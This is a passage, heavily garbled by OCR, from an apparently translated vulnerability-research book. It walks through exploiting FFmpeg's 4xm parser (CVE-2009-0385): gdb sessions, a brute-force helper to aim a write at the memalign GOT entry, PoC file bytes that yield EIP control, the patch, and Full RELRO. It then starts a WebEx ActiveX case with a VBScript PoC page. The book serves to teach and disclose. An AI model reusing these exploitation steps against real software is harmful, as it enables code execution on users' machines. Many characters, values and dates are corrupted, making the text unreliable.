图 4-$ ”修改 后 的 样 例文 件 strk 块 。 所 做 的 改动 已 高 亮 显 示 并 加 框 ， 
标示 的 数字 即 上 文 提 到 的 数字 





linux$ gdb ./ffmpeg g 

GNU gdb 6.8-debian 

Copyright (C) 2008 Free Software Foundation, Inc. 

License GPLv3+: GNU GPL version 3 or later «http://gnu.org/licenses/gpl.html» 
This is free software: you are free to change and redistribute it. 

There is NO WARRANTY, to the extent permitted by law. Type "show copying" 
and "show warranty" for details. 

This GDB was configured as "i486-linux-gnu"... 


(gdb) set disassembly-flavor intel 


(gdb) run -i poc1.4xm 


Starting program: /home/tk/BHD/ffmpeg/ffmpeg g -i poci.4xm 
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. 
configuration: 
libavutil 49.12. O / 49.12. O 
libavcodec 52.10. O / 52.10. O 
libavformat 52.23. 1 / 52.23. 1 
libavdevice 52. 1. 0 / 52. 1. 0 
built on Jan 24 2009 02:30:50, gcc: 4.3.3 


Program received signal SIGSEGV, Segmentation fault. 

0x0809c89d in fourxm read header (s=0x8913330, ap=0xbf8b6c24) at 
libavformat/4xm.c:178 

178 fourxm->tracks[current_track].adpcm = AV RL32(&header[i + 12]); 


不 出 所 料 , FFmpeg 因 段 错误 在 源 代 码 第 178 F. 我 在 调试 器 中 进一步 分 
Nt FFmpeg 进程 ， 看 看 究 苋 是 什么 导致 了 月 尝 。 





(gdb) info registers 


eax Oxbbbbbbbb -1145324613 

ecx 0x891c400 143770624 

edx 0x0 0 

ebx Oxaaaaaaaa -1431655766 

esp Oxbf8b6aa0 Oxbf8b6aa0 

ebp 0x55555548 0x55555548 

esi 0x891c3cO 143770560 

edi 0x891C340 143770432 

eip 0x809c89d 0x809c89d «fourxm read header+509> 
eflags 0x10207 [ CF PF IF RF | 
CS 0x73 115 

SS 0x7b 123 

ds Ox7b 123 

es Ox7b 123 

fs 0x0 0 

gs 0x33 51 





Ft AHERN, AAS EAX 和 EBX 填 人 了 我 输入 的 audio type {E ( oxbbbbbbbb ) 
和 track number 值 (0xaaaaaaaa )。 接 下 来 ， 我 让 调试 硕 显 示 FFmpeg 执行 的 最 后 


一 条 指令 。 


(gdb) x/1i $eip 


0x809c89d «fourxm read header+509>: 


mov 
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DWORD PTR [edx«ebp*140x10],eax 





Ui aed ra rz. PBB HERTS EAEE Oxbbbbbbbb 写 入 基于 我 的 
track number 计算 得 到 的 一 个 地 址 。 
为 了 控制 内 存 写 操作 ， 我 需要 知道 写 操 作 的 目标 地 址 是 怎么 计算 出 来 的 。 从 
下 面 这 段 汇编 代码 里 我 找到 了 答案 。 





(gdb) x/7i $eip - 21 


0x809c888 
0x809c88b 
0x809c88f 
0x809c892 
0x809c896 
0x809c899 
0x809c89d 


<fourxm read header+488>: 
<fourxm read header+491>: 
«fourxm read header+495>: 
«fourxm read header+498>: 
«fourxm read header+502>: 
«fourxm read header+505>: 
«fourxm read header+509>: 


lea 
mov 
mov 
mov 
shl 
mov 
mov 


这 些 指 令 对 应 下 面 的 C 源 代码 。 


lss 
178 


K 4-2 解释 了 这 些 指 仿 的 结 


表 4-2 ”汇编 指令 及 每 条 指令 的 结果 清单 


LES 


lea ebp, [ebxt+ebx*4 | 


mov eax,DWORD PTR [esp+0x34] 
mov edx,DWORD PTR [esi+0x10 | 
shl ebp ,0Ox2 

mov eax,DWORD PRT 


[ecx«eax*140xc | 
mov DWORD PTR 
[edx+ebp*1+0x10] , eax 





fourxm-»tracks[current track].adpcm 


ebp, [ebx+ebx*4 | 

eax,DWORD PTR [esp+0x34] 
edx,DWORD PTR [esi+0x10] 

DWORD PTR [esp+0x28], ebp 
ebp , 0x2 

eax,DWORD PTR [ecx+eax*1+0xc | 
DWORD PTR [edx+ebp*1+0x10 | , eax 


= AV RL32(&header[i + 12]); 


结 m 


ebp = ebx + ebx * 4 (EBX 寄 存 器 里 存放 的 是 用 户 定 义 的 


current track 值 (0xaaaaaaaa)) 


eax = array index i 


edx = fourxm->tracks 


ebp = ebp «« 2 
eax = AV RL32(&header[I + 12]); 或 


eax = ecx[eax + Oxc]; 


fourxm-»tracks[current track].adpcm = eax; or 


edx[ebp + 0x10] = eax; 





因为 EBX 寄存 需 里 的 值 是 我 提供 给 变量 current track AY, EDX 寄存 需 里 的 值 
是 fourxm-»tracks 这 个 空 指针 ， 上 面 这 个 计算 可 以 表示 为 : 


edx + ((ebx + ebx * 4) «« 2) + 0x10 = destination address of the write operation 











或 者 更 简单 的 形式 ， 


60 | 642% 3859057 


edx + (ebx * 20) + 0x10 = destination address of the write operation 


我 把 值 0xaaaaaaaa 给 了 变量 current track ( EBX 寄存 器 )， 因 此 这 个 计算 应 
该 像 下 面 这 样 : 
NULL + (Oxaaaaaaaa * 20) + Ox10 = 0x55555558 

0x55555558 这 个 结束 可 由 调试 硕 确 认 : 


(gdb) x/1x $edx+$ebp+0x10 
0x5 5555558: Cannot access memory at address 0x55555558 


42.4 ”第 四 步 : 修改 这 个 strk 块 以 控制 EIP 


这 个 涯 洞 让 我 可 以 用 任何 4 字 市 值 覆 写 几 乎 任 革 的 内 存 地 址 。 为 了 控制 
FFmpeg 的 执行 流 ， 我 必须 履 写 一 处 能 让 我 控制 EIP 寄存 器 的 内 存 位 置 。 我 必须 
找到 一 个 可 靠 的 内 存 地 址 ， 它 在 FFmpeg 的 进程 地 址 空间 里 是 可 预知 的 。 这 就 排 
除了 进程 的 所 有 栈 地 址 空间 。 但 是 ，Linux 使 用 的 ELF ( Executable and Linkable 
Format ) 文件 格式 提供 了 一 个 近乎 完美 的 目标 : 全 局 偏 移 量 表 ( Global Offset 
Table, GOT )。FFmpeg 中 使 用 的 每 一 个 库 男 数 在 GOT 中 部 有 一 条 引用 。 通 过 操 
控 GOT AH, 我 可 以 轻易 地 控制 程序 的 执行 流 ( 见 A.4 市 ), GOT 的 好 处 是 可 预 
知 ， 这 正 是 我 需要 的 。 我 可 以 通过 徐 写 漏洞 发 生 后 调用 的 库 孔 数 GOT 入 口 来 控 
制 EIP。 

那么 ， 任 意 内 存 写 操作 (arbitrary memory write ) 之 后 会 调用 哪个 库 函 数 呢 ? 
要 回答 这 个 问题 ,我 义 看 了 看 源 代码 。 


























源 代 码 文 件 libavformat/Axm.c 


eKA fourxm read header() 


184 /* allocate a new AVStream */ 
185 st - av new stream(s, current track); 


[ 


紧 跟 着 那 4 处 内 存 写 操作 之 后 , 程序 使 用 果 数 av_new_stream() 分 配 了 一 个 新 
的 AVStream. 


源 代 码 文 件  libavformat/utils.c 


函数 av new stream() 


2271 AVStream *av new stream(AVFormatContext *s, int id) 
2272-1 
2273 AVStream *st; 


2274 int i; 

2275 

2276 if (s-»nb streams >= MAX STREAMS) 
2277 return NULL; 

2278 


2279 st = av_mallocz(sizeof (AVStream) ) ; 


[sa 
第 2279 行 ,调用 了 为 一 个 名 为 av_mallocz() 的 函数 。 


源 代码 文件 libavutil/mem.c 
函数 av mallocz() 和 av malloc() 


[..] 


43 void *av malloc(unsigned int size) 


45 void *ptr = NULL; 
46 #ifdef CONFIG MEMALIGN HACK 
47 long diff; 


48 #endif 

49 

50 /* let's disallow possible ambiguous cases */ 
51 if(size » (INT MAX-16) ) 

52 return NULL; 

53 


54 #ifdef CONFIG MEMALIGN HACK 

55 ptr = malloc(size+16); 

56 if (!ptr) 

57 return ptr; 

58 diff= ((-(long)ptr - 1)815) + 1; 
59 ptr = (char*)ptr + diff; 

60 ((char*)ptr)[-1]= diff; 

61 #elif defined (HAVE POSIX MEMALIGN) 


62 posix memalign(&ptr,16, size); 

63 #elif defined (HAVE MEMALIGN) 

64 ptr = memalign(16,size); 

[..] 

135 void *av mallocz(unsigned int size) 
136 { 

137 void *ptr - av malloc(size); 
138 if (ptr) 

139 memset(ptr, O, size); 

140 return ptr; 


141 j 
[ 
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第 137 fTWSIFH T PEZ av_malloc(),av_malloc()7E 64 47 HAAN memalign()C 其 


他 的 ifdef 分 支 (第 54 行 和 第 61 行 ) Æ Ubuntu Linux 9.04 平 台 上 均 未 定义 )。 看 
到 memalign() 函 数 我 很 兴奋 ， 因 为 这 正 是 我 想 找 的 : 一 个 在 漏洞 触发 后 紧 接 着 调 
FAR KZ ( 见 图 4-6 )。 


FFmpeg d # ek $ 


fourxm_read_header() av_mallocz() av_malloc() 





4i dod FFmpeg 内 部 函数 FFmpeg rh ip dots 


memalign() 


库 功 能 





图 4-6 ”函数 调用 图 ， 显 示 从 漏洞 函数 到 memalign( ) 的 调用 关系 


这 市 来 了 下 一 个 问题 : 在 FFmpeg 中 memalign() 的 GOT 入口 地 址 是 什么 ? 
通过 objdump 我 得 到 如 下 信息 。 


linux$ objdump -R ffmpeg g | grep memalign 
08560204 R 386 JUMP SLOT posix memalign 











因此 我 需要 禾 写 的 地 址 是 0x08560204。 我 要 做 的 是 计算 出 那个 合适 的 track 
number 值 (current track )。 可 以 用 以 下 两 个 方法 中 的 任意 一 个 来 得 到 这 个 变量 
E: 尝试 通过 计算 得 出 , 或 者 使 用 烘 力 方法 。 我 选择 容易 的 方法 ， 写 了 以 下 程序 。 





代码 清单 4-1 一 个 使 用 暴力 方法 找到 current track 的 合适 值 的 辅助 小 程序 
(addr brute force.c ) 


#include <stdio.h> 

// GOT entry address of memalign() 

#define MEMALIGN GOT ADDR 0x08560204 
// Min and max value for 'current track' 
#define SEARCH START 0x80000000 
#define SEARCH END OxFFFFFFFF 
int 

main (void) 


unsigned int a, b = 0; 
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15 for (a = SEARCH START; a < SEARCH END; a++) 1 

16 b = (a * 20) + 0x10; 

17 if (b == MEMALIGN GOT ADDR) { 

18 printf ("Value for 'current track': %08x\n", a); 
19 return 0; 

20 } 

21 } 

22 

23 printf ("No valid value for ‘current track' found.\n"); 
24 

25 return 1; 

26 } 





代码 清单 4-1 CPESTRFETERI2S 7I ZriE dx SIBI GG AY track number fH 
( current track ), 用 这 个 人 来 履 写 第 4 行 定 义 的 GOT 地址 .这 是 通过 党 试 current track 
所 有 可 能 值 ， 直 到 计算 结果 ( 见 第 16 行 ) 匹配 搜索 到 的 memalign() 的 GOT A A 
Stik (ULES 17 行 ) 来 完成 的 。 为 了 触发 这 个 漏洞 current track 必须 解释 为 一 
个 负数 ， 因 此 只 考虑 在 0x80000000 到 oxffffffff 范围 内 的 值 ( 见 第 15 行 )。 
示范 : 
linux$ gcc -o addr brute force addr brute force.c 


linux$ ./addr brute force 
Value for 'current track': 8d378019 


然后 我 调整 了 样 例文 件 ， 并 把 它 重 命名 为 poc2.4xme。 
我 唯一 改变 的 就 是 track number 的 值 ( ILEI 4-7 中 的 (1 ))。 现 在 ， 它 和 我 用 
辅助 小 程序 得 到 的 值 相 符 了 。 


(1) 


000001a0h: 32 2E 77 61 76 00 73 74 72 6B 28 00 00 oo [19 80]; 2.wav.strk(....€ 
000001b0h: [37 8D]BB BB BB BB|oo 00 04 00 D1 07 00 00 2F 00 ; 7 »»»»....N.../. 





图 4-7 调整 过 track number (current track) 值 之 后 文件 poc2.4xm 的 strk 块 
然后 在 调试 可 中 测试 这 个 新 的 POC 文件 ( 以 下 调试 命令 的 描述 见 B.4 T )。 
linux$ gdb -q ./ffmpeg g 
(gdb) run -i poc2.4xm 
Starting program: /home/tk/BHD/ffmpeg/ffmpeg g -i poc2.4xm 


FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. 
configuration: 


libavutil 49.12. 0 / 49.12. 0 
libavcodec 52.10. O 7 52.10. 0 
libavformat 52.23. 1 / 52.23. 1 
libavdevice 52. 1. O / 52. 1. 0 


built on Jan 24 2009 02:30:50, gcc: 4.3.3 


Program received signal SIGSEGV, Segmentation fault. 
Oxbbbbbbbb in ?? () 


(gdb) info registers 


eax Oxbfc1dddo -1077813808 
ecx Ox9f69400 167154688 
edx 0x9f60330 167117616 
ebx OxO 0 

esp Oxbfciddac Oxbfciddac 
ebp 0x85601f4 0x85601f4 
esi 0x164 356 

edi 0x9f60330 167117616 
eip Oxbbbbbbbb Oxbbbbbbbb 
eflags 0x10293 [ CF AF SF IF RF |] 
CS 0x73 115 

SS 0x7b 123 

ds Ox7b 123 

es Ox7b 123 

fs 0x0 0 

gs 0x33 51 


看 ! 完全 控制 了 EIP。 能 够 控制 指令 指针 之 后 ， 我 针对 这 个 源 洞 开发 了 一 个 
利用 程序 。 用 VLC 多 媒体 播放 带 作 为 注入 癌 量 ， 因 为 它 使 用 了 FFmpeg 市 有 这 个 
漏洞 的 版 本 。 

前 面 几 章 已 经 所 及， 德国 的 法 律 不 允许 我 提供 一 个 完整 可 工作 的 漏洞 利用 程 
序 ， 但 是 你 可 以 在 本 书 的 网 站 上 观看 我 录制 的 一 个 视频 片段 ， 其 中 演示 了 实际 的 
漏洞 利用 操作 。™ 
































图 4-8 总 结 了 我 利用 这 个 汤 洞 的 步 台 。 下 面 误 析 图 中 展示 的 bug. 


FFmpeg it #2 


|] 


fourxm->tracks[curvent_track].adpem = 


(3) AV_RL32(&header[i + 1.2]); 


GOT: memalign() (1) 
ERR PLE MEE QUEUNT RI 
* current track 
+ he £2 (8 
pe NULL 一 | | 


图 4-8 图 解 我 是 如 何 利用 这 个 FFmpeg bug 的 


4xm 文件 
(2) 
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(D 内 存 写 操作 的 目标 地 址 是 由 current track 作为 一 个 索引 (NULL + 
current track + 偏 移 值 ) 计算 出 的 。current track 的 值 来 自 4xm 媒体 文件 的 用 
户 控 制 数据 。 

(2) 内 存 写 操作 的 源 数据 来 目 媒 体 文件 的 用 户 控制 数据 。 

(3) 用 户 控 制 数据 复制 到 memalign() RAAE GOT 中 的 入 口 位 置 。 


4.3 漏洞 修正 


2000 年 /月 27 日 ， 星 期 二 


在 我 将 这 一 bug 通知 了 FFmpeg 的 维护 者 之 后 , 他 们 开发 了 下 面 这 个 补丁 。 


--- a/libavformat/4xm.c 

+++ b/libavformat/4xm.c 

@@ -166,12 4166,13 @@ static int fourxm read header(AVFormatContext *s, 
goto fail; 


} 
current track = AV_RL32(&header[i + 8]); 
if((unsigned)current track >= UINT MAX / sizeof(AudioTrack) - 1){ 
av log(s, AV LOG ERROR, "current track too large\n"); 
ret- -1; 
goto fail; 


++ +++ 


if (current track + 1 > fourxm->track count) { 
fourxm-»track count = current track + 1; 
if((unsigned)fourxm-»track count >= UINT MAX / sizeof(AudioTrack))( 
ret- -1; 
goto fail; 


fourxm-»tracks - av realloc(fourxm-»tracks, 
fourxm-»track count * sizeof(AudioTrack)); 
if (!fourxm->tracks) { 


这 个 补丁 重新 做 了 长 度 检 查 ， 从 而 限制 current track 的 最 大 值 不 能 超过 
0OX09249247。 


(UINT MAX  / sizeof(AudioTrack) - 1) - 1 
(Oxffffffff / Oxic -1)-1 


maximum allowed value for current track 
0x09249247 


补丁 打 在 正确 的 地 方 ，current track 就 不 会 是 负数 ， 这 个 漏洞 真正 修复 了 。 

这 个 补丁 在 源 代 码 级 清除 了 这 个 漏洞 。 也 有 普通 的 漏洞 利用 绥 解 技术 可 以 让 
利用 这 个 bug 变 得 更 难 。 为 了 控制 执行 流 ， 我 必须 畴 写 一 个 内 存 位 置 以 控制 EIP。 
这 个 例子 中 我 用 的 是 GOT 入 口 地 址 。RELRO 缓解 技术 有 一 种 操作 模式 叫 作 完 全 








RELRO (Full RELRO), È (Œ) 映射 GOT 2g Hz, DAE, BLZ BIB) S 
GOT 的 技巧 来 控制 FFmpeg 执行 流 便 做 不 到 了 。 然 而 ， 还 有 RELRO 技术 绥 解 不 
了 的 其 他 漏洞 利用 技术 仍然 可 以 控制 EIP。 

为 了 使 用 完全 RELRO 缓解 技术 ，FFmepg X X RELRO sÉ RR 4b ob 
需要 额外 使 用 以 下 链接 选项 重新 编译 二 进 制 文 “更 多 信 自 
TF. -Wl, -z, relro, -z. now. 

重新 编译 带 有 完全 RELRO 支持 的 FFmpeg 示例 如 下 。 











linux$ ./configure --extra-ldflags-"-Wl,-z,relro,-z,now" 
linux$ make 


得 到 memalign()HJ GOT AL: 


linux$ objdump -R ./ffmpeg g | grep memalign 
0855ffdo R 386 JUMP SLOT posix memalign 


调整 代码 清单 4-1 URS, BER DE R] current track 的 值 。 


linux$ ./addr brute force 
Value for 'current track': 806ab330 





做 一 个 新 的 POC 文件 (poc relro.4xm ), Xs ey as AA CE P 
试 命令 的 描述 见 B.4 市 )。 
(gdb) set disassembly-flavor intel 


(gdb) run -i poc relro.4xm 
Starting program: /home/tk/BHD/ffmpeg relro/ffmpeg g -i poc relro.4xm 
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. 
configuration: --extra-ldflags--Wl,-z,relro,-z,now 
libavutil 49.124. 0 7 49.12. 0 
libavcodec 52.10. 0 / 52.10. 0 
libavformat 52.23. 1 / 52.23. 1 
libavdevice 52. 1. O / 52. 1. D 
built on Jan 24 2009 09:07:58, gcc: 4.3.3 


Program received signal SIGSEGV, Segmentation fault. 
0x0809c89d in fourxm read header (s=0xa836330, ap=0xbfb19674) at 


libavformat/4xm.c:178 
178 fourxm-»tracks[current track].adpcm = AV RL32(&header[i + 12]); 


当 FFmpeg 22 Vie Pris SER RATA CPT Ait. AF ETA 
BUS Bi. BCVA ar mo SA ey eae FFmpeg 执行 的 最 后 一 条 指令 。 








(gdb) info registers 
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eax Oxbbbbbbbb -1145324613 

ecx 0xa83f3e0 176419808 

edx OxO 0 

ebx 0x806ab330 - 2140490960 

esp Oxbfb194f0 Oxbfb194f0 

ebp Ox855ffcO Ox855ffcO 

esi 0xa83F3a0 176419744 

edi 0xa83f330 176419632 

eip 0x809c89d 0x809c89d «fourxm read header+509> 
eflags 0x10206 [ PF IF RF | 

CS 0x73 115 

SS Ox7b 123 

ds Ox7b 123 

es Ox7b 123 

fs 0x0 0 

gs 0x33 51 

(gdb) x/1i $eip 

Ox809c89d «fourxm read header+509>: mov DWORD PTR [edx«ebp*140x10],eax 


此 外 也 显示 了 FFmpeg 试图 保存 EAX 寄存 


(gdb) x/1x $edx+$ebp+0x10 
Ox855ffdo < GLOBAL OFFSET TABLE 4528»: 


不 出 所 料 ，FFmpeg 试图 把 EAX 寄存 
的 地 址 (0x855ffd0)。 


(gdb) shell cat /proc/$(pidof Pipe g)/maps 
08048000-0855f000 r-xp 00000000 08:01 101582 
0855f000-08560000 r--p 00516000 08:01 101582 
08560000-0856c000 rw-p 00517000 08:01 101582 
0856c000-0888c000 rw-p 0856c000 00:00 0 

0a834000-0a855000 rw-p 03834000 00:00 0 

b7d60000-b7d61000 rw-p b7d60000 00:00 0 

b7d61000-b7ebd000 r-xp 00000000 08:01 148202 
b7ebd000-b7ebe000 ---p 0015c000 08:01 148202 
b7ebe000-b7ec0000 r--p 0015c000 08:01 148202 
b7ec0000-b7ec1000 rw-p 0015e000 08:01 148202 
b7ec1000-b7ec5000 rw-p b7ec1000 00:00 0 

b7ec5000-b7ec7000 r-xp 00000000 08:01 148208 
b7ec7000-b7ec8000 r--p 00001000 08:01 148208 
b7ec8000-b7ec9000 rw-p 00002000 08:01 148208 
b7ec9000-b7eed000 r-xp 00000000 08:01 148210 
b7eed000-b7eee000 r--p 00023000 08:01 148210 
b7eee000-b7eef000 rw-p 00024000 08:01 148210 
b7efc000-b7efe000 rw-p b7efc000 00:00 0 

b7efe000-b7eff000 r-xp b7efe000 00:00 0 

b7eff000-b7f1b000 r-xp 00000000 08:01 130839 
b7f1b000-b71c000 r--p 0001b000 08:01 130839 
b7f1c000-b7f1d000 rw-p 0001c000 08:01 130839 
bfb07000-bfb1c000 rw-p bffeb000 00:00 0 


AMR Hy HOE 


Oxb7dd4d40 


器 的 值 写 到 memalign() A GOT 入 口 提供 


/home/tk/BHD/ffmpeg relro/ffmpeg g 
/home/tk/BHD/ffmpeg relro/ffmpeg g 
/home/tk/BHD/ffmpeg relro/ffmpeg g 


[heap] 


/lib/tls/i686/cmov/libc-2.9.so 
/lib/tls/i686/cmov/libc-2.9.so 
/lib/tls/i686/cmov/libc-2.9.so 
/lib/tls/i686/cmov/libc-2.9.so 


/lib/tl1s/1686/cmov/libdl-2.9.so 
/lib/tl1s/1686/cmov/libdl-2.9.so 
/lib/tl1s/1686/cmov/libdl-2.9.so 
/lib/tl1s/1686/cmov/libm-2.9.so 
/lib/tls/i686/cmov/libm-2.9.so 
/lib/tl1s/1686/cmov/libm-2.9.so 


| vdso] 
/lib/ld-2.9.so 
/lib/ld-2.9.so 
/lib/ld-2.9.so 
[ stack | 
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这 一 次 FFmpeg RRAS RIEA GOT 入 口 ( 见地 址 0855f000 到 08560000 
处 GOT AY r--p 权限 ) 时 由 于 上 段 错 误 而 朋 沉 。 看 来 完全 RELRO 技术 确实 可 以 成 
HER GOT 履 写 。 





44 ”经 验 和 教训 


作为 一 名 程序 员 : 

a 不 要 混 消 不 同 的 数据 类 型 ; 

口 了 解 编译 右上 自动 进行 的 隐蔽 转换 。 这 些 隐 式 的 转换 非常 微妙 ， 会 导致 大 量 
的 安全 bug (UL A.3 7D); 

a 扎实 掌握 C 语 言 的 类 型 转换 ; 

a 不 是 所 有 的 用 户 空间 空 指 针 解 引用 都 是 拒绝 服务 攻击 (Dos ) 那么 简单 ， 
其 中 有 一 些 是 非常 严重 的 漏洞 ， 会 导致 任意 代码 执行 ; 

O 完全 RELRO 能 帮助 缓解 GOT 复写 漏洞 利用 技术 。 

作为 一 名 媒体 播放 融 的 用 户 : 

a 永远 不 要 相信 媒体 文件 扩展 名 ( 见 2.5 市 )。 





























4.5 补充 


2009 年 1 月 28 日 ， 里 期 三 





漏洞 已 经 修复 ( 图 4-9 显示 了 时 间 表 )， 新 版 本 的 FFmpeg 也 可 以 获得 了 ， 
此 我 在 自己 的 网 站 上 发 布 了 详细 的 安全 报告 所 。 这 个 bug 编号 是 CVE-2009-0385。 
FFmpe9 维 护 者 打 补 丁 


FFmpe9 维 护 者 得 到 通知 
FFmPe9 修 补 版 发 布 我 的 室 全 报告 公开 


O1.27.2004 O1.28.2004 





图 4-9 FFmpeg bug 从 告知 到 发 布 修复 版 本 的 时 间 表 


附注 
[1] Jd http://wiki.multimedia.cx/index.php?title-YouTube ( 短 址 为 http://bit.ly/xDbNah )。 
[2] JL http:/fftmpeg.org/download.html(〈 短 址 为 http://bit.ly/wHaMsSs )。 
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JL http://www.trapkit.de/books/bhd/ ( 短 址 为 http://bit.ly/yZX6td )。 

AX 电影 文件 格式 的 详细 介绍 可 从 以 下 网 址 找到 : /http://wiki.multimedia.cx/index.php? 
title-4xm Format ( 短 址 为 http:/bit.Iy/xqBSYT ). 

JL http://www.trapkit.de/books/bhd/ ( 短 址 为 http://bit.ly/yZX6td )。 

FFmpeg 维护 者 提供 的 补丁 可 从 以 下 网 址 得 到 : http://git.-videolan.org/?p=ffmpeg.git;a= 
commitdiff;h-0838cfdc8a10185604db5cd9d6bffad71279a0e8 ( 短 址 为 http://bit.ly/AEpLF3 ). 
关于 类 型 转换 及 相关 安全 问题 的 更 多 信息 可 参考 Mark Dowd、John McDonald 和 Justin 
Schuh 的 The Art of Software Security Assessment: Identifying and Preventing Software 
Vulnerabilities ( Indianapolis,IN: Addison-Wesley Professional, 2007 )。 可 获得 的 样 章 参 见 
http://ptgmedia.pearsoncmg.com/images/0321444426/samplechapter/Dowd ch06.pdf ( 短 址 为 
http://bit.ly/xj WPgB )。 

我 的 摘 述 这 个 FFmpeg Jie: AY ee dh ur AT AP AHERE: http://www.trapkit.de/ 
advisories/TKADV2009-004.txt ( HEX http://bit.ly/x7jozO ). 











浏览 即 遭 动 持 


2008 年 4 月 6 日 ， 星 期 日 








现在 ， 浏 览 需 和 浏览 需 插 件 中 的 漏洞 开始 流行 起 来 ， 因 此 我 打算 查看 一 些 
ActiveX F. 第 一 个 查看 的 就 是 商业 领域 中 广泛 使 用 的 思科 在 线 会 议 、 网 络 会 议 
软件 WebEx。 花 了 一 些 时 间 逆 加 工程 WebEx 的 微软 IE iid ActiveX 控件 后 ， 
我 找到 了 一 个 很 明显 的 bug， 如 末 我 使 用 模糊 测试 方法 而 不 是 谈 汇 编 代 码 ， 几 秘 
钟 内 就 能 找到 它 。 真 没 成 就 感 。， 








5.1 BASES zal 


寻找 漏洞 的 步骤 如 下 。 [人 下 步 gz th 我 使 用 的 平 
a 第 一 步 : 列 出 WebEx 注册 的 对 象 和 导出 & B 32 位 Windows XP SP3 操作 
方法 。 系统 和 和 1E6. 








O 第 二 步 : 在 浏览 硕 中 测试 导出 方法 。 

O 第 三 步 : 找到 二 进 制 文件 中 的 对 和 象 方法 。 
a 第 四 步 : 找到 用 户 控 制 的 输入 数值 。 

D 第 五 步 : 逆 癌 工程 这 个 对 象 方法 。 











5.1. 探寻 漏洞 


注意 ”以 下 网 址 中 可 以 找到 下 载 这 个 漏洞 版 本 的 WebEx 会 议 管理 软件 ( WebEx 
Meeting Manager ) 的 链接 : http://www.trapkit.de/books/bhd/. 


5.1.1 第 一 步 : 列 出 WebEx 注 册 的 对 象 和 导出 方法 


下 载 安 装 WebEx 会 议 管理 软件 之 后 ,我 运行 COMRaider 1， 生成 一 份 控 件 提 
供给 调用 者 的 导出 接口 清单 。 点 击 COMRaider 的 Start 按钮 并 且 选 择 “ 扫 描 上 日 录 
查找 已 注册 的 COM 服务 ”( Scan a directory for registered COM servers ) 来 测试 
WebEx 组 件 。 

如 图 5-1 所 示 ，WebEx 安装 日 录 下 注册 了 两 个 对 象 ， 而 GUID 为 {32E26FD9- 
F435-4A20-A561-35D4B987CFDC} , ProgID 为 WebexUCFObject. WebexUCF- 
Object.1 的 对 和 象 实现 了 IObjectSafety HO. IE 会 信任 这 个 对 象 ， 因 为 它 标记 为 可 
安全 初始 化 ( safe for initialization) 和 可 安全 执行 脚本 (safe for scripting )。 这 使 
该 对 象 可 能 成 为 “浏览 即 遭 支持 ”(browse and you're owned ) 攻击 的 目标 ， 因 为 
它 的 方法 有 可 能 会 从 网 页 中 调用 。" 








2*2 classes found to objects registered in this path 


4. 6.08 (EDGE 2E 99- DAAT 1104 ABAS. MENUSAR TSC} mug qutt. 1 C: Um Nm nvr - 


| 
Selected File [C Program Files*w/ebE xNw'ebE 3S824^atucfobj. dll Description \WebexUCFObject Class 
|WebexUCFObject WebexUCFObie GUID [(32E 26FD9-F435-4420-4561-35D4B987CFDC} Select | 


RegKey Safe for Script: False 


Safety Report 


IDisp Safe: Safe for untrusted: caller.data 





图 5-1 COMRaider 中 WebEx 注册 的 对 象 


fi — —- C#2 ClassId.csP!, EAP LSI ActiveX 控件 的 各 
种 属性 。 为 使 用 这 ， 我 在 源 文件 中 添加 了 如 下 几 行 ,并 用 Visual Studio 的 C£ 
命令 行 编译 需 fess FM 


[..] 


namespace ClassId 
class ClassId 


static void Main(string[] args) 
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SWI.ClassId q.ClassId clsid = new SWI.ClassId q.ClassId(); 


if (args.Length == 0 || (args[o].Equals(“/?") == true || 
args[o]. ToLower(). StartsWith("-h") -- true) || 


args.Length « 1) 


Console.WriteLine("Usage: ClassID.exe <CLSID>\n"); 
return; 


j 


clsid.set clsid(args[0]); 
System.Console.WriteLine(clsid.ToString()); 


在 命令 提示 符 窗 口 运行 以 下 命令 ， 编 详 并 使 用 这 个 工具 。 


C:\Documents and Settings\tk\Desktop>csc /warn:0 /nologo ClassId.cs 

C:\Documents and Settings\tk\Desktop>ClassId.exe {32E26FD9-F435-4A20-A561-35D4B987CFDC} 
Clsid: {32E26FD9-F435-4A20-A561-35D4B987CFDC} 

Progid: WebexUCFObject.WebexUCFOb ject.1 

Binary Path: C: \Program Files \WebEx\WebEx\824\atucfobj.d11 

Implements IObjectSafety: True 

Safe For Initialization (IObjectSafety): True 

Safe For Scripting (IObjectSafety): True 

Safe For Initialization (Registry): False 

Safe For Scripting (Registry): False 


KillBitted: False 


工具 的 输出 显示 这 个 对 象 确实 是 通过 I0bjectSafety 接口 标记 为 可 安全 初始 
eet cou. 

然后 点 击 COMRaider 中 的 Select #2411, 查看 GUID X (32E26FD9-F435-4A20- 
pewter 如 图 5-2 所 示 ， 该 对 和 象 导 出 





的 方法 New0bject() 以 一 个 字符 串 值 作为 输入 。 


>“ COMRaider Only showing class [32E26FD9-F435-4A20-A561-35D4B987CFDC] 


COM Server [C:\Program FilesNW'ebE xNwebE x\824\atuctobj dll _2 | fv. Show only fuzzable 


I ATUCFOBJLib Function NewObject ( 
| =) gH WebexUCFObject ByVal bstrCompName As String 
=| =O WebexUCFAuthor ) As Long 
xy NewO bject 





Lise right click nenu on treeview to generate fuzz files m 
Next>> 


图 5-2 GUID Jy (32E26FD9-F435-4A20-A561-35DA4B987CFDC 的 对 象 导 
出 的 公共 方法 
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5.1.2 第 二 步 : 在 浏览 器 中 测试 导出 方法 


生成 可 用 的 对 象 及 导出 方法 列表 之 后 ,我 写 了 一 个 简单 的 HIML 文件 ,通过 
VBScript 调用 New0bject() 方 法 。 


代码 清单 5-1 调用 New0bject() 方 法 的 HTML 文件 ( webex pocl.html ) 


01 «html» 

02 «title»WebEx PoC 1</title> 
03 «body» 

04 <object classid="clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC" id="obj"></object> 
05 <script language- vbscript'» 

06 arg - String(12, "A") 

07 obj.NewObject ar 
08  «/script» 

09 </body> 

10 «/html» 


o 
o 


代码 清单 5-1 的 第 47, Sch GUID BK ClassID X (32E26FD9-F435-4A20- 
A561-35D4B987CFDC} 的 对 象 。 第 7 行 调用 New0bject() 方 法 ， 参 数 是 由 12 个 字 
符 A 组 成 的 字符 串 。 

为 了 测试 这 个 HTML 文件 ， 我 用 Python 实现 了 一 个 简单 的 Web 服务 器 ， 它 
可 以 伺服 webex pocl.html 文件 给 浏览 右 ( 见 代 人 码 清 单 5-2 )。 


代码 清单 5-2 Python 实现 的 一 个 简单 Web HRS arta ROC webex_pocl.html ( www 
